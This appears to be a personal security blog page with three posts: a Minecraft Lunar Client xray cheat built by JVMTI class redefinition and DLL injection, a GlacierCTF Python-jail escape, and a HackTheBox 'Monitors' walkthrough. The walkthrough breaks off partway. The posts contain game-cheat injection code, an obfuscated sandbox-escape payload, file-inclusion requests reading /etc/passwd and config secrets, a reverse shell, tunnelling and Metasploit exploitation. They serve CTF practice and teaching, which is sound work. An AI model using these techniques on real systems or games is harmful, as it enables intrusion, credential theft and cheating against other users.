jsthope

[Minecraft] Simple xray for lunar client

Thu, 04 Dec 2025 00:00:00 GMT

Goal

Make a basic xray by overwriting JVM classes at runtime.

Bridge

First we will need to inject our own class to be allowed to communicate between the JVM and the DLL

// JNIBridge.java
public class JNIBridge {
    public static native boolean allowBlock(String blockName);
    public static native boolean xrayOn();
}

Make sure to compile it to .class with the right JDK version (for me JDK 1.6.0 because I will use Lunar 1.8.9).

allowBlock will ask the DLL if we need to render the block or not.
xrayOn will ask the DLL if xray is on.

Dump all classes

Then we will look at which class we want to edit. Here, for my xray, I want to edit the Block class because this is where the game performs the render logic.

Find the `net/minecraft/block/Block` class

To get the Block.class you can either unzip the JAR file, or if you want, you can also dump all classes with some dynamic class dumper (you can make your own or use this one - you can use Process Hacker to inject the DLL).

If your client is not on Forge it might have some obfuscated methods and class names. If so, you can check:

Edit Block class with Recaf

Then you will need to patch the class file. I like to use Recaf to do so.

In Recaf, find the method you would like to edit. For me, shouldSideBeRendered, because this method returns whether a side should be rendered or not, so for my xray I will be able to control what to render or not.

public boolean shouldSideBeRendered(IBlockAccess iBlockAccess, BlockPos blockPos, EnumFacing enumFacing) {
+       if (JNIBridge.xrayOn()) {
+           return JNIBridge.allowBlock(this.toString())
+       };
        CallbackInfoReturnable callbackInfoReturnable = new CallbackInfoReturnable("shouldSideBeRendered", true);
        handler$zgg000$lunar$xrayDontRenderBlockSides(iBlockAccess, blockPos, enumFacing, callbackInfoReturnable);
        if (callbackInfoReturnable.isCancelled()) {
            return callbackInfoReturnable.getReturnValueZ();
        }
        if (enumFacing == EnumFacing.DOWN && this.minY > 0.0d) {
            return true;
        }
        if (enumFacing == EnumFacing.UP && this.maxY < 1.0d) {
            return true;
        }
        if (enumFacing == EnumFacing.NORTH && this.minZ > 0.0d) {
            return true;
        }
        if (enumFacing == EnumFacing.SOUTH && this.maxZ < 1.0d) {
            return true;
        }
        if (enumFacing != EnumFacing.WEST || this.minX <= 0.0d) {
            return (enumFacing == EnumFacing.EAST && this.maxX < 1.0d) || !iBlockAccess.getBlockState(blockPos).getBlock().isOpaqueCube();
        }
        return true;
    }

.method public shouldSideBeRendered (Lnet/minecraft/world/IBlockAccess;Lnet/minecraft/util/BlockPos;Lnet/minecraft/util/EnumFacing;)Z {
    parameters: { this, ☃, ☃2, ☃3 },
    code: {
+   R:
+       invokestatic JNIBridge.xrayOn ()Z
+       ifeq A
+       aload this
+       invokevirtual java/lang/Object.toString ()Ljava/lang/String;
+       invokestatic JNIBridge.allowBlock (Ljava/lang/String;)Z
+       ireturn 
    A: 
        new org/spongepowered/asm/mixin/injection/callback/CallbackInfoReturnable
        dup 
        ldc "shouldSideBeRendered"
        iconst_1 
        invokespecial org/spongepowered/asm/mixin/injection/callback/CallbackInfoReturnable.<init> (Ljava/lang/String;Z)V
        astore v4
        aload this
        aload ☃
        aload ☃2
        aload ☃3
        aload v4
        invokevirtual net/minecraft/block/Block.handler$zgg000$lunar$xrayDontRenderBlockSides (Lnet/minecraft/world/IBlockAccess;Lnet/minecraft/util/BlockPos;Lnet/minecraft/util/EnumFacing;Lorg/spongepowered/asm/mixin/injection/callback/CallbackInfoReturnable;)V
        aload v4
        invokevirtual org/spongepowered/asm/mixin/injection/callback/CallbackInfoReturnable.isCancelled ()Z
        ifeq B
        aload v4
        invokevirtual org/spongepowered/asm/mixin/injection/callback/CallbackInfoReturnable.getReturnValueZ ()Z
        ireturn 
    B: 
        line 390
        aload ☃3
        getstatic net/minecraft/util/EnumFacing.DOWN Lnet/minecraft/util/EnumFacing;
        if_acmpne D
        aload this
        getfield net/minecraft/block/Block.minY D
        dconst_0 
        dcmpl 
        ifle D
    C: 
        line 391
        iconst_1 
        ireturn 
    D: 
        line 393
        aload ☃3
        getstatic net/minecraft/util/EnumFacing.UP Lnet/minecraft/util/EnumFacing;
        if_acmpne F
        aload this
        getfield net/minecraft/block/Block.maxY D
        dconst_1 
        dcmpg 
        ifge F
    E: 
        line 394
        iconst_1 
        ireturn 
    F: 
        line 396
        aload ☃3
        getstatic net/minecraft/util/EnumFacing.NORTH Lnet/minecraft/util/EnumFacing;
        if_acmpne H
        aload this
        getfield net/minecraft/block/Block.minZ D
        dconst_0 
        dcmpl 
        ifle H
    G: 
        line 397
        iconst_1 
        ireturn 
    H: 
        line 399
        aload ☃3
        getstatic net/minecraft/util/EnumFacing.SOUTH Lnet/minecraft/util/EnumFacing;
        if_acmpne J
        aload this
        getfield net/minecraft/block/Block.maxZ D
        dconst_1 
        dcmpg 
        ifge J
    I: 
        line 400
        iconst_1 
        ireturn 
    J: 
        line 402
        aload ☃3
        getstatic net/minecraft/util/EnumFacing.WEST Lnet/minecraft/util/EnumFacing;
        if_acmpne L
        aload this
        getfield net/minecraft/block/Block.minX D
        dconst_0 
        dcmpl 
        ifle L
    K: 
        line 403
        iconst_1 
        ireturn 
    L: 
        line 405
        aload ☃3
        getstatic net/minecraft/util/EnumFacing.EAST Lnet/minecraft/util/EnumFacing;
        if_acmpne N
        aload this
        getfield net/minecraft/block/Block.maxX D
        dconst_1 
        dcmpg 
        ifge N
    M: 
        line 406
        iconst_1 
        ireturn 
    N: 
        line 408
        aload ☃
        aload ☃2
        invokeinterface net/minecraft/world/IBlockAccess.getBlockState (Lnet/minecraft/util/BlockPos;)Lnet/minecraft/block/state/IBlockState;
        invokeinterface net/minecraft/block/state/IBlockState.getBlock ()Lnet/minecraft/block/Block;
        invokevirtual net/minecraft/block/Block.isOpaqueCube ()Z
        ifne O
        iconst_1 
        goto P
    O: 
        iconst_0 
    P: 
        ireturn 
    Q: 
    }
}

You can also make a fullbright effect if xray is on:

public float getAmbientOcclusionLightValue() {
+    if (JNIBridge.xrayOn()) {
+        return 1.0f;
+    }
    CallbackInfoReturnable v1 = new CallbackInfoReturnable("getAmbientOcclusionLightValue", true);
    handler$zgg000$lunar$setXrayLightLevel(v1);
    return v1.isCancelled() ? v1.getReturnValueF() : isBlockNormalCube() ? 0.2f : 1.0f;
}

.method public getAmbientOcclusionLightValue ()F {
    parameters: { this },
    code: {
+   Z:
+       invokestatic JNIBridge.xrayOn ()Z
+       ifeq A
+       fconst_1 
+       freturn 
    A: 
        new org/spongepowered/asm/mixin/injection/callback/CallbackInfoReturnable
        dup 
        ldc "getAmbientOcclusionLightValue"
        iconst_1 
        invokespecial org/spongepowered/asm/mixin/injection/callback/CallbackInfoReturnable.<init> (Ljava/lang/String;Z)V
        astore v1
        aload this
        aload v1
        invokevirtual net/minecraft/block/Block.handler$zgg000$lunar$setXrayLightLevel (Lorg/spongepowered/asm/mixin/injection/callback/CallbackInfoReturnable;)V
        aload v1
        invokevirtual org/spongepowered/asm/mixin/injection/callback/CallbackInfoReturnable.isCancelled ()Z
        ifeq B
        aload v1
        invokevirtual org/spongepowered/asm/mixin/injection/callback/CallbackInfoReturnable.getReturnValueF ()F
        freturn 
    B: 
        line 832
        aload this
        invokevirtual net/minecraft/block/Block.isBlockNormalCube ()Z
        ifeq C
        ldc 0.200000003F
        goto D
    C: 
        fconst_1 
    D: 
        freturn 
    E: 
    }
}

public int getLightValue() {
+   if (JNIBridge.xrayOn()) {
+       return 15;
+   }
    return this.lightValue;
}

.method public getLightValue ()I {
    parameters: { this },
    code: {
+   Z:
+       invokestatic JNIBridge.xrayOn ()Z
+       ifeq A
+       bipush 15
+       ireturn
    A: 
        line 119
        aload this
        getfield net/minecraft/block/Block.lightValue I
        ireturn 
    B: 
    }
}

Implement the DLL native method logic

Bool Enable / Disable Logic

First, for the enable logic, I will just return a boolean variable g_xrayEnabled. I will switch it on/off with a thread that checks if I press some keys:

static jboolean JNICALL Native_xrayOn(JNIEnv*, jclass)
{
    return g_xrayEnabled ? JNI_TRUE : JNI_FALSE;
}

AllowBlock

In this example, I will just check if it's a _ore block. If so, allowBlock will return true, else false:

static jboolean JNICALL Native_allowBlock(JNIEnv* env, jclass, jstring jName)
{
    if (!jName)
        return JNI_FALSE;

    const char* utf = env->GetStringUTFChars(jName, nullptr);
    bool allowed = false;

    if (utf)
    {
        const char* suffix = "_ore}";
        const size_t len = std::strlen(utf);
        const size_t suf_len = std::strlen(suffix);

        if (len >= suf_len && std::strcmp(utf + (len - suf_len), suffix) == 0)
        {
            allowed = true;
        }

        env->ReleaseStringUTFChars(jName, utf);
    }

    return allowed ? JNI_TRUE : JNI_FALSE;
}

Overwriting classes

Block Class

For the next steps you will first need to set up JNI and JVMTI and find the Block class (tiEnv here is my JVMTI env):

jclass blockClass = nullptr;

for (int i = 0; i < classCount; ++i)
{
    char* sig = nullptr;
    if (tiEnv->GetClassSignature(classes[i], &sig, nullptr) == JVMTI_ERROR_NONE && sig)
    {
        if (std::strcmp(sig, "Lnet/minecraft/block/Block;") == 0)
        {
            blockClass = classes[i];
            break;
        }
    }
}

Then you will be able to redefine classes with JVMTI like this:

jvmtiClassDefinition def;
std::memset(&def, 0, sizeof(def));
def.klass = blockClass;
def.class_byte_count = (jint)sizeof(block_class_bytes);
def.class_bytes = block_class_bytes;

err = tiEnv->RedefineClasses(1, &def);

block_class_bytes here is just a char block_class_bytes[] that contains the bytes of our custom Block class that we patched before with Recaf.

Insert our Bridge class

First, to insert a new class we will need to find the classloader. We can easily obtain it with GetClassLoader from JVMTI by using the location of the known blockClass (env here is my JNI env):

jobject blockLoader = nullptr;
err = tiEnv->GetClassLoader(blockClass, &blockLoader);

jclass jniBridgeClass = env->DefineClass(
    "JNIBridge",
    blockLoader,
    reinterpret_cast<const jbyte*>(JNIBridge_class),
    (jsize)sizeof(JNIBridge_class)
);

Then we will be able to register all our native methods:

JNINativeMethod methods[] = {
    {
        const_cast<char*>("allowBlock"),
        const_cast<char*>("(Ljava/lang/String;)Z"),
        (void*)&Native_allowBlock
    },
    {
        const_cast<char*>("xrayOn"),
        const_cast<char*>("()Z"),
        (void*)&Native_xrayOn
    }
};

if (env->RegisterNatives(jniBridgeClass, methods, sizeof(methods) / sizeof(methods[0])) != 0)
{
    LOGF("[MainThread] RegisterNatives(JNIBridge) failed");
    break;
}
LOGF("[MainThread] JNIBridge natives registered");

Reload Chunk

To enable or disable certain rendering features (such as xray), the game must refresh the visual state of all loaded blocks. This requires triggering a full chunk reload inside Minecraft’s rendering engine.

However, Minecraft imposes strict constraints: chunk reloading may only be executed from the render thread. Calling it from any other thread (e.g., a native worker thread) can cause OpenGL context errors or Java exceptions.

To safely perform a reload from native code, the system relies on three key mechanisms:

A global reload request flag.
A function hook that intercepts execution on the render thread.
A JNI-based function that invokes Minecraft’s internal chunk-reload method.

1. Reload Request Flag (`g_needReload`)

Any part of the native code that wants the game to refresh its chunks does not call Minecraft directly. Instead, it simply raises a flag:

static volatile bool g_needReload = false;

And when a reload is needed:

g_needReload = true;

This flag indicates:

"A reload should happen, but only when we are safely on the render thread."

This prevents invalid thread access to rendering systems or JVM structures.

2. Render Thread Hook (`glOrtho` Detour)

Minecraft’s rendering pipeline frequently calls an OpenGL function named glOrtho. Most importantly:

It is always called on the render thread.
It is called every frame, guaranteeing regular execution points.

The system replaces glOrtho with a custom wrapper. This wrapper performs the following:

Checks whether a reload was requested (g_needReload).
If so, resets the flag and initiates a safe reload.
Then calls the original glOrtho to preserve the normal game behavior.

Example wrapper (simplified):

void hk_glOrtho(...) {
    if (g_needReload) {
        g_needReload = false;
        ReloadChunks();   // safe to call here
    }

    original_glOrtho(...); // continue normal rendering
}

How the hook is installed

I will uses MinHook, a lightweight and widely used Windows API hooking library.

Simplified:

MH_Initialize();
MH_CreateHook(&glOrtho, &hk_glOrtho, &original_glOrtho);
MH_EnableHook(MH_ALL_HOOKS);

3. Java-Based Chunk Reload (`ReloadChunks()`)

The actual reloading is achieved by calling Minecraft’s internal method:

Minecraft.getMinecraft().renderGlobal.loadRenderers();

To do this safely from native code, the system uses JNI.

ReloadChunks() {
    // Get JVM thread context
    JNIEnv* env = ...;

    // Call Minecraft.getMinecraft()
    minecraftInstance = call_static_method("Minecraft", "getMinecraft");

    // Access minecraft.renderGlobal
    renderGlobal = get_field(minecraftInstance, "renderGlobal");

    // Perform the actual reload
    call_method(renderGlobal, "loadRenderers");
}

Conclusion

And there we have it — with the class patches, the native bridge, the JVM runtime overwrite, and the chunk-reload system, we now have everything needed to build a fully functional xray for Minecraft.
From here, you can extend the logic, implement reach, ESP, ...

Feel free to dm me on discord : jsthop3

Credit

https://www.unknowncheats.me/forum/minecraft/713887-jni-defineclass-redefineclass-runtime.html

Source Code

The full project is available on GitHub:

https://github.com/jsthope/SimpleLunarXray

[GlacierCTF 2023 - Misc] Avatar

Mon, 27 Nov 2023 00:00:00 GMT

Introduction

This challenge was during the GlacierCTF 2023.

The goal of this challenge is to escape from this prison to retrieve the flag.

print("You get one chance to awaken from the ice prison.")
code = input("input: ").strip()


whitelist = """gctf{"*+*(=>:/)*+*"}""" # not the flag
if any([x not in whitelist for x in code]) or len(code) > 40000:
    
    print("Denied!")
    exit(0)

eval(eval(code, {'globals': {}, '__builtins__': {}}, {}), {'globals': {}, '__builtins__': {}}, {})

First condition

We will first focus on the first condition:

whitelist = """gctf{"*+*(=>:/)*+*"}"""

Numbers

The aim here is to find a trick to be able to write all numbers and later the characters.

We quickly find a way to obtain numbers with:

digits = {
    0: '+("g"=="c")',
    1: '+("g"=="g")'}

for i in range(2, 150):
    digits[i] = digits[i-1] + digits[1] # True + True = 2...

This code will later be optimized to:

digits = {
    0: '+("">"")',
    1: '+(""=="")',
    }

Thus, thanks to f-strings (since f is allowed) we can obtain all numbers.

Letters

We then find a way to obtain letters using an f-string feature:

f"""{digits[97]:c}""" # returns the corresponding unicode here

We then write these two functions to be able to build our obfuscated payload:

def letter(letter_wanted):
    return '{'+digits[ord(letter_wanted)]+':c}'


def get_string(string_wanted):
    ret_str = ''
    for let in string_wanted:
        ret_str += letter(let)
    return 'f"""' + ret_str + '"""'

Second condition

We can then build our payload. However, we quickly run into a problem: the second condition.

Here is the payload we want to use:

().__class__.__base__.__subclasses__()[107]().load_module('os').system('cat flag.txt')

The problem is that this obfuscated payload has 67887 characters... And the second condition therefore does not accept it...

len(code) > 40000

Optimization

Our method for writing numbers writes 6 as 1+1+1+1+1+1. However, it is much more compact to write it as (1+1+1)*(1+1) (especially for large numbers).

Thus, we implement a check if the number is a multiple of 2 or 3 in order to save length (it’s not the most optimal, but it gets us well below 40,000).

for i in range(2, 150):
    if i % 2 == 0:
        digits[i] = digits[i/2] + '*((""=="")+(""==""))'
    elif i % 3 == 0:
        digits[i] = digits[i/3] + '*((""=="")+(""=="")+(""==""))'
    else:
        digits[i] = "(" + digits[i-1] + digits[1] + ")"

These optimizations reduce our payload to 13227 characters!

We then faced a big problem: no response from the server...

Payload

It’s time to look at the payload now. The payload was chosen based on the following restriction:

eval(eval(code, {'globals': {}, '__builtins__': {}}, {}), {'globals': {}, '__builtins__': {}}, {})

We see here that there are neither __builtins__ nor globals. So the code evaluated with eval will not have access to Python’s built-in functions (print, __import__, etc ...) (cf python.org)

This is not a problem in itself because ways to bypass these restrictions exist (cf hacktricks)

The payload is as follows:

().__class__.__base__.__subclasses__()[107]().load_module('os').system('cat flag.txt')

It tries to invoke <class '_frozen_importlib.BuiltinImporter'> using ().__class__.__base__.__subclasses__()[107] in order to use the builtins again.

The problem is that in most cases <class '_frozen_importlib.BuiltinImporter'> is at index 107. However, the index may depend on the Python version.

All that remained was to brute-force the index and hope for a positive response.

for i in range(90,120):
    string_wanted = f"""().__class__.__base__.__subclasses__()[{i}]().load_module('os').system('cat flag.txt')"""
    obf = get_string(string_wanted)

    print(len(obf))
    #context.log_level = 'debug'

    p = remote("chall.glacierctf.com",13384)
    p.recv()
    p.sendline(obf)
    try: 
        print(p.recv())
        break
    except EOFError:
        pass
    p.close()

p.success(f"Correct Payload was: {string_wanted}")

[HTB - Hard] Monitors

Sat, 09 Sep 2023 00:00:00 GMT

Marcus

Nmap

We start by scanning the IP’s ports:

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sV -sC -A 10.10.10.238
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 bacccd81fc9155f3f6a91f4ee8bee52e (RSA)
|   256 6943376a1809f5e77a67b81811ead765 (ECDSA)
|_  256 5d5e3f67ef7d762315114b53f8413a94 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: WordPress 5.5.1
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Welcome to Monitor &#8211; Taking hardware monitoring seriously

TRACEROUTE (using port 80/tcp)
HOP RTT      ADDRESS
1   23.69 ms 10.10.14.1
2   25.52 ms monitors.htb (10.10.10.238)

Hosts

Then we add the domain to /etc/hosts:

┌──(root㉿kali)-[/home/kali]
└─# echo "10.10.10.238 monitors.htb" >> /etc/hosts

Wordpress

Nmap showed the site uses WordPress 5.5.1, so we’ll scan this WordPress site with wpscan:

┌──(kali㉿kali)-[~]
└─$ sudo wpscan --url http://monitors.htb -e ap,t,tt,u --api-token TOKEN
[...]
[i] Plugin(s) Identified:

[+] wp-with-spritz
 | Location: http://monitors.htb/wp-content/plugins/wp-with-spritz/
 | Latest Version: 1.0 (up to date)
 | Last Updated: 2015-08-20T20:15:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | [!] 1 vulnerability identified:
 |
 | [!] Title: WP with Spritz 1.0 - Unauthenticated File Inclusion
 |     References:
 |      - https://wpscan.com/vulnerability/cdd8b32a-b424-4548-a801-bbacbaad23f8
 |      - https://www.exploit-db.com/exploits/44544/
 |
 | Version: 4.2.4 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://monitors.htb/wp-content/plugins/wp-with-spritz/readme.txt
[...]

Wordpress RFI

Wpscan tells us the wp-with-spritz plugin version is vulnerable to an RFI:

┌──(kali㉿kali)-[~]
└─$ locate 44544                       
/usr/share/exploitdb/exploits/php/webapps/44544.php
          
┌──(kali㉿kali)-[~]
└─$ cat /usr/share/exploitdb/exploits/php/webapps/44544.php                                  
# Exploit Title: WordPress Plugin WP with Spritz 1.0 - Remote File Inclusion
# Date: 2018-04-25
# Exploit Author: Wadeek
# Software Link: https://downloads.wordpress.org/plugin/wp-with-spritz.zip
# Software Version: 1.0
# Google Dork: intitle:("Spritz Login Success") AND inurl:("wp-with-spritz/wp.spritz.login.success.html")
# Tested on: Apache2 with PHP 7 on Linux
# Category: webapps


1. Version Disclosure

/wp-content/plugins/wp-with-spritz/readme.txt

2. Source Code

if(isset($_GET['url'])){
$content=file_get_contents($_GET['url']);

3. Proof of Concept

/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd
/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=http(s)://domain/exec

So, let’s check Apache’s configuration:

┌──(kali㉿kali)-[~]
└─$ curl http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/apache2/sites-enabled/000-default.conf
# Default virtual host settings
# Add monitors.htb.conf
# Add cacti-admin.monitors.htb.conf

<VirtualHost *:80>
[...]

We then find a new domain to add:

┌──(root㉿kali)-[/home/kali]
└─# echo "10.10.10.238 cacti-admin.monitors.htb" >> /etc/hosts

The monitors.htb config shows the site’s document root is /var/www/wordpress:

┌──(kali㉿kali)-[~]
└─$ curl http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/apache2/sites-enabled/monitors.htb.conf 
[...]
        ServerAdmin admin@monitors.htb
        ServerName monitors.htb
        ServerAlias monitors.htb
        DocumentRoot /var/www/wordpress
[...]

Then the WordPress config file wp-config.php gives us the database password:

┌──(kali㉿kali)-[~]
└─$ curl http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../../var/www/wordpress/wp-config.php

define( 'DB_NAME', 'wordpress' );

/** MySQL database username */
define( 'DB_USER', 'wpadmin' );

/** MySQL database password */
define( 'DB_PASSWORD', 'BestAdministrator@2020!' );

Cacti

Let’s go to the new site we found:

This site uses cacti 1.2.12. Let’s see if there are known exploits for this version:

┌──(kali㉿kali)-[~]
└─$ searchsploit cacti 1.2.12
------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                                    |  Path
------------------------------------------------------------------------------------------------------------------ ---------------------------------
Cacti 1.2.12 - 'filter' SQL Injection                                                                             | php/webapps/49810.py
------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
Papers: No Results

┌──(kali㉿kali)-[~]
└─$ locate php/webapps/49810.py        
/usr/share/exploitdb/exploits/php/webapps/49810.py

└─$ python3 /usr/share/exploitdb/exploits/php/webapps/49810.py
usage: 49810.py [-h] -t <target/host URL> -u <user> -p <password> --lhost <lhost> --lport <lport>
49810.py: error: the following arguments are required: -t, -u, -p, --lhost, --lport

We need a password; if we try admin:BestAdministrator@2020! it works. The exploit gets an RCE via an SQLi:

┌──(kali㉿kali)-[~/Desktop]
└─$ python3 /usr/share/exploitdb/exploits/php/webapps/49810.py -t http://cacti-admin.monitors.htb -u admin -p BestAdministrator@2020! --lhost 10.10.14.5 --lport 4444 
[+] Connecting to the server...
[+] Retrieving CSRF token...
[+] Got CSRF token: sid:cd05039fb335b6d5cbf9fcecc77db39a5d777669,1694259967
[+] Trying to log in...
[+] Successfully logged in!

[+] SQL Injection:
"name","hex"
"",""
"admin","$2y$10$TycpbAes3hYvzsbRxUEbc.dTqT0MdgVipJNBYu8b7rUlmB8zn8JwK"
"guest","43e9a4ab75570f5b"

[+] Check your nc listener!

The reverse shell worked and our netcat shows we’re connected as www-data:

┌──(kali㉿kali)-[~]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.238] 33632
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

At this point, I always use this command to upgrade my shell (though here it’s probably unnecessary):

$ python3 -c 'import pty; pty.spawn("/bin/sh")'

www-data -> marcus

Let’s look for references to the user marcus:

$ grep 'marcus' /etc -R 2>/dev/null
grep 'marcus' /etc -R 2>/dev/null
/etc/group-:marcus:x:1000:
/etc/subgid:marcus:165536:65536
/etc/group:marcus:x:1000:
/etc/passwd:marcus:x:1000:1000:Marcus Haynes:/home/marcus:/bin/bash
/etc/systemd/system/cacti-backup.service:ExecStart=/home/marcus/.backup/backup.sh
/etc/subuid:marcus:165536:65536
/etc/passwd-:marcus:x:1000:1000:Marcus Haynes:/home/marcus:/bin/bash

$ cat /home/marcus/.backup/backup.sh
cat /home/marcus/.backup/backup.sh                                                                                                                  
#!/bin/bash                                                                                                                                         
                                                                                                                                                    
backup_name="cacti_backup"                                                                                                                          
config_pass="VerticalEdge2020"

zip /tmp/${backup_name}.zip /usr/share/cacti/cacti/*
sshpass -p "${config_pass}" scp /tmp/${backup_name} 192.168.1.14:/opt/backup_collection/${backup_name}.zip
rm /tmp/${backup_name}.zip

We then obtain a new password VerticalEdge2020.

Root

With this, we connect to Marcus’s SSH:

┌──(kali㉿kali)-[~]
└─$ ssh marcus@monitors.htb    
marcus@monitors:~$

We also get the user flag:

marcus@monitors:~$ cat user.txt 
5bb7..443ea

linpeas.sh

Now we aim to escalate privileges to root. To do so, we’ll use linpeas.sh to enumerate interesting information.

Neither curl nor wget is available, so we won’t use HTTP to send files; we’ll use netcat since it’s available:

# Target:
$ nc -l -p 1234 > linpeas.sh
nc -l -p 1234 > linpeas.sh

# Kali:
┌──(kali㉿kali)-[~/Desktop/linpeas-server]
└─$ nc -w 3 10.10.10.238 1234 < linpeas.sh

We run linpeas:

$ chmod +x linpeas.sh
chmod +x linpeas.sh
$ ./linpeas.sh

Linpeas shows the locally used ports:

╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports                                                                                                                                                               
tcp        0      0 127.0.0.1:8443          0.0.0.0:*               LISTEN      -                                                                                                                                                           
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::80                   :::*                    LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -

Tunnel (Chisel)

The service 127.0.0.1:8443 catches my eye, so we’ll set up a proxy to access the local network:

marcus@monitors:~$ nc -l -p 1234 > chisel
marcus@monitors:~$ chmod +x chisel
marcus@monitors:~$ ./chisel client 10.10.14.5:8000 R:8443:127.0.0.1:1080

┌──(kali㉿kali)-[~/Desktop/linpeas-server]
└─$ ./chisel server -p 8000 --reverse
2023/09/09 17:23:05 server: Reverse tunnelling enabled
2023/09/09 17:23:05 server: Fingerprint byl8Mf/Bu9BZsKH8mG4H4E3zwSd50oTi+HL4CEFwWc8=
2023/09/09 17:23:05 server: Listening on http://0.0.0.0:8000
2023/09/09 17:23:05 server: session#1: tun: proxy#R:8443=>8443: Listening

Chisel then created a tunnel to access https://localhost:8443/ on our own machine:

┌──(kali㉿kali)-[~/Desktop/linpeas-server]
└─$ dirsearch -u "https://localhost:8443/"

dirsearch shows that https://localhost:8443/solr/ exists.

With a quick search we find:

ofbiz exploit

We then find that https://localhost:8443/solr/#/ redirects to https://localhost:8443/solr/control/checkLogin/#/: This service uses ofbiz 17.12.01.

Searchsploit

┌──(kali㉿kali)-[~]
└─$ searchsploit ofbiz                      
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                                                            |  Path
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Apache OFBiz - Admin Creator                                                                                                              | multiple/remote/12264.txt
Apache OFBiz - Multiple Cross-Site Scripting Vulnerabilities                                                                              | php/webapps/12330.txt
Apache OFBiz - Remote Execution (via SQL Execution)                                                                                       | multiple/remote/12263.txt
Apache OFBiz 10.4.x - Multiple Cross-Site Scripting Vulnerabilities                                                                       | multiple/remote/38230.txt
Apache OFBiz 16.11.04 - XML External Entity Injection                                                                                     | java/webapps/45673.py
Apache OFBiz 16.11.05 - Cross-Site Scripting                                                                                              | multiple/webapps/45975.txt
Apache OFBiz 17.12.03 - Cross-Site Request Forgery (Account Takeover)                                                                     | java/webapps/48408.txt
ApacheOfBiz 17.12.01 - Remote Command Execution (RCE)                                                                                     | java/webapps/50178.sh
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
Papers: No Results

Metasploit

The exploit found with searchsploit doesn’t work. I then look in Metasploit:

┌──(kali㉿kali)-[~/Desktop]
└─$ msfconsole                          
msf6 > search ofbiz

Matching Modules
================

   #  Name                                                  Disclosure Date  Rank       Check  Description
   -  ----                                                  ---------------  ----       -----  -----------
   0  exploit/linux/http/apache_ofbiz_deserialization_soap  2021-03-22       excellent  Yes    Apache OFBiz SOAP Java Deserialization
   1  exploit/linux/http/apache_ofbiz_deserialization       2020-07-13       excellent  Yes    Apache OFBiz XML-RPC Java Deserialization
   2  auxiliary/scanner/http/log4shell_scanner              2021-12-09       normal     No     Log4Shell HTTP Scanner

Let’s use Apache OFBiz XML-RPC Java Deserialization:

msf6 > use 1
[*] Using configured payload linux/x64/meterpreter_reverse_https

After configuration I have:

msf6 exploit(linux/http/apache_ofbiz_deserialization) > show options

Module options (exploit/linux/http/apache_ofbiz_deserialization):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     127.0.0.1        yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT      8443             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addres
                                         ses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       Base path
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Payload options (linux/x64/meterpreter_reverse_https):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.14.5       yes       The local listener hostname
   LPORT  4444             yes       The local listener port
   LURI                    no        The HTTP Path


Exploit target:

   Id  Name
   --  ----
   1   Linux Dropper

All that’s left is to run it:

msf6 exploit(linux/http/apache_ofbiz_deserialization) > run
[*] Started HTTPS reverse handler on https://10.10.14.5:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Exploit aborted due to failure: not-vulnerable: The target is not exploitable. Target cannot deserialize arbitrary data. "set ForceExploit true" to override check result.
[*] Exploit completed, but no session was created.
msf6 exploit(linux/http/apache_ofbiz_deserialization) > set ForceExploit true
ForceExploit => true
msf6 exploit(linux/http/apache_ofbiz_deserialization) > run

Docker

At this stage, we see we’re in a docker compose environment:

meterpreter > cat /proc/1/cgroup
12:pids:/docker/69506ef7a41b39b56262c2f634281cffb6792b0be677ee04c6a3fac480a0983b
11:cpuset:/docker/69506ef7a41b39b56262c2f634281cffb6792b0be677ee04c6a3fac480a0983b
10:hugetlb:/docker/69506ef7a41b39b56262c2f634281cffb6792b0be677ee04c6a3fac480a0983b
9:devices:/docker/69506ef7a41b39b56262c2f634281cffb6792b0be677ee04c6a3fac480a0983b
8:blkio:/docker/69506ef7a41b39b56262c2f634281cffb6792b0be677ee04c6a3fac480a0983b
7:cpu,cpuacct:/docker/69506ef7a41b39b56262c2f634281cffb6792b0be677ee04c6a3fac480a0983b
